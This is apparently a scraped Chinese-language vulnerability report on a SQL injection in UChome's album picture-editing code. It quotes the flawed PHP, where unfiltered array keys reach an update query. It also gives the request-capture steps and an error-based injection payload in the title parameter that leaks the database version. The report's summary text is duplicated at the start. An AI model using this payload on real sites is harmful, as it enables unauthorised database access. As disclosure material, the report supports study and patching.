VULHUB ™

### 简要描述： UChome 注入漏洞 ### 详细说明： ``` source/cp_clbum.php } elseif($_GET['op'] == 'editpic') { $managealbum = checkperm('managealbum'); include_once(S_ROOT.'./source/function_bbcode.php'); if($albumid > 0) { $query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('album')." WHERE albumid='$albumid'"); if(!$album = $_SGLOBAL['db']->fetch_array($query)) { showmessage('no_privilege'); } if($album['uid'] != $_SGLOBAL['supe_uid'] && !$managealbum) { showmessage('no_privilege'); } } if(submitcheck('editpicsubmit')) { if($_GET['subop'] == 'delete') { //删除 $updates = $deleteids = array(); foreach ($_POST['title'] as $picid => $value) { if(empty($_POST['ids'][$picid])) { $title = getstr($value, 150, 1, 1, 1); $wherearr = array('picid'=>$picid); if(!$managealbum) $wherearr['uid'] = $_SGLOBAL['supe_uid'];//自己 updatetable('pic', array('title'=>$title), $wherearr); } else { $deleteids[$picid] = $picid; } } if($deleteids) { include_once(S_ROOT.'./source/function_delete.php');...

### 简要描述： UChome 注入漏洞 ### 详细说明： ``` source/cp_clbum.php } elseif($_GET['op'] == 'editpic') { $managealbum = checkperm('managealbum'); include_once(S_ROOT.'./source/function_bbcode.php'); if($albumid > 0) { $query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('album')." WHERE albumid='$albumid'"); if(!$album = $_SGLOBAL['db']->fetch_array($query)) { showmessage('no_privilege'); } if($album['uid'] != $_SGLOBAL['supe_uid'] && !$managealbum) { showmessage('no_privilege'); } } if(submitcheck('editpicsubmit')) { if($_GET['subop'] == 'delete') { //删除 $updates = $deleteids = array(); foreach ($_POST['title'] as $picid => $value) { if(empty($_POST['ids'][$picid])) { $title = getstr($value, 150, 1, 1, 1); $wherearr = array('picid'=>$picid); if(!$managealbum) $wherearr['uid'] = $_SGLOBAL['supe_uid'];//自己 updatetable('pic', array('title'=>$title), $wherearr); } else { $deleteids[$picid] = $picid; } } if($deleteids) { include_once(S_ROOT.'./source/function_delete.php'); deletepics($deleteids); } } elseif($_GET['subop'] == 'update') { foreach ($_POST['title'] as $picid => $value) { $title = getstr($value, 150, 1, 1, 1);// //echo 2222222;exit(); $wherearr = array('picid'=>$picid);//这里可以看到KEY没有过滤~~ if(!$managealbum) $wherearr['uid'] = $_SGLOBAL['supe_uid'];//自己 updatetable('pic', array('title'=>$title), $wherearr); } ``` ### 漏洞证明： 利用方法 首先注册用户 然后新建一个相册 http://127.0.0.1/uchome/space.php?uid=2&do=album&view=me 打开这里点上床 新建完了之后 上传一个图片 完了之后 点进相册 然后在点刚刚上传的图片 点击管理图片 直接确认 然后抓包 把titie的那个改成 title%5B1' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#%5D 原始内容可能是title%5B1%5D 修改成上面的 就可以看到错误信息了 [<img src="https://images.seebug.org/upload/201311/25225920c992a286a8849c80c50ec44ab63bdff1.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/25225920c992a286a8849c80c50ec44ab63bdff1.jpg) [<img src="https://images.seebug.org/upload/201311/252259266c1882ed7bc4474d8bb46aa6e7a8f6e9.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/252259266c1882ed7bc4474d8bb46aa6e7a8f6e9.jpg) [<img src="https://images.seebug.org/upload/201311/252259354fc91d0218c6c12ef586e7ff0c1d8c05.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/252259354fc91d0218c6c12ef586e7ff0c1d8c05.jpg) [<img src="https://images.seebug.org/upload/201311/25230103d1e1057277ef1710492f04548f7731cd.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/25230103d1e1057277ef1710492f04548f7731cd.jpg)